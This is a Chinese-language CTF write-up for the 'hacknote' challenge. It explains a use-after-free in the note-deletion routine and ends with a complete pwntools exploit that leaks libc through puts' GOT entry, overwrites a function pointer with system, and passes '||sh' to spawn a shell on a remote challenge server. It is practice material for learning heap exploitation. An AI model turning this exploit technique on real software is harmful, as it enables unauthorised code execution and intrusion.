攻防世界 —— hacknote

题目分析

主函数

主函数比较简单就是输入1-4，执行相应的功能

Add note功能：

存在一个notelist表，notelist可放5个元素，每次执行Add时看是否存在空闲空间，存在则申请一个8byte的空间，前4byte字节存放putself函数地址，后4byte再申请一块子空间，大小为size，内容为用户输入，具体如下:

这里有两点：1. 存在一个函数put_self，并且函数参数为1的，后四个字节指向另一块空间，大小和内容均可以由用户输入

delete_note功能:

delete_note比较简单，就是free Add函数申请的空间，但存在UAF漏洞

print_note功能：

非常简单，就是调用notelist表中所指向地址的函数，参数为自身，如图，正常情况就是put_self函数，参数为自身地址(此处为0xfffffff)

漏洞分析

漏洞主要存在于add_note和delete_note中，假设一个这样的场景：

1. 先add_note()，并申请一块size=16的空间，内容随意
2. 再add_note()，并申请一块size=16的空间，内容随意
3. delete_note(1),delete_note(2)，整体结构如图：
   
4. 再add_note()，并申请一块size=8的空间，内容随意，这时则会发送变化了。首先add_note需要8byte，会使用第二次add_note()被释放的8byte空间，也就是2号，由于第二次申请的还是8byte，则第一次add_note()被释放8byte也就是1号被使用，图示为：
   
   这时候就有意思了，由于删除时只释放内存每释放指针，所以note_list中的1和2仍还指向原地址空间，而3处指向的地址空间为1和2的8字节处的地址，并且由于二级指针处可以写入数据，所以3可以向1指向的8byte字节写入数据

我们的思想就是通过notelist[3]可以直接控制notelist[1]处空间，将notelist[1]的put_self换成system，sub_chunk换成||sh

这个||sh是shell注入，因为按照原来的show的逻辑,是这样的

system(notelist[i])
现在为system( XXXX||sh)，先执行system(XXXX)，若不行则执行system(sh)

攻击代码

from pwn import *

url, port = "61.147.171.105", 51068
filename = "./hacknote"
elf = ELF(filename)
# context(arch="amd32", os="linux")
context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    context.terminal = ['tmux', 'splitw', '-h']
    libc = elf.libc
    # gdb.attach(io)
else:
    libc = ELF("./libc_32.so.6")
    io = remote(url, port)

def BK():
    gdb.attach(io) #  "b *" + str(hex(addr))

def Add(size,content):
    io.sendlineafter(b'Your choice :',b'1')
    io.sendlineafter(b'Note size :',str(size))
    io.sendlineafter(b'Content :',content)

def Print(index):
    io.sendlineafter(b'Your choice :',b'3')
    io.sendlineafter(b'Index :',str(index))

def Del(index):
    io.sendlineafter(b'Your choice :',b'2')
    io.sendlineafter(b'Index :',str(index))

def pwn():
    Add(0x20, "zzzz")
    Add(0x20, "zzzz")
    Del(0)
    Del(1)

    puts_func_addr = 0x804862B
    puts_got = elf.got['puts']
    payload = p32(puts_func_addr) + p32(puts_got)
    Add(0x8, payload)
    Print(0)
    libc_base = u32(io.recv(4)) - libc.sym['puts']

    Del(2)
    system_addr = libc_base + libc.sym["system"]
    payload = p32(system_addr) + b"||sh"
    Add(0x8, payload)
    Print(0)
    io.interactive()

if __name__ == '__main__':
    pwn()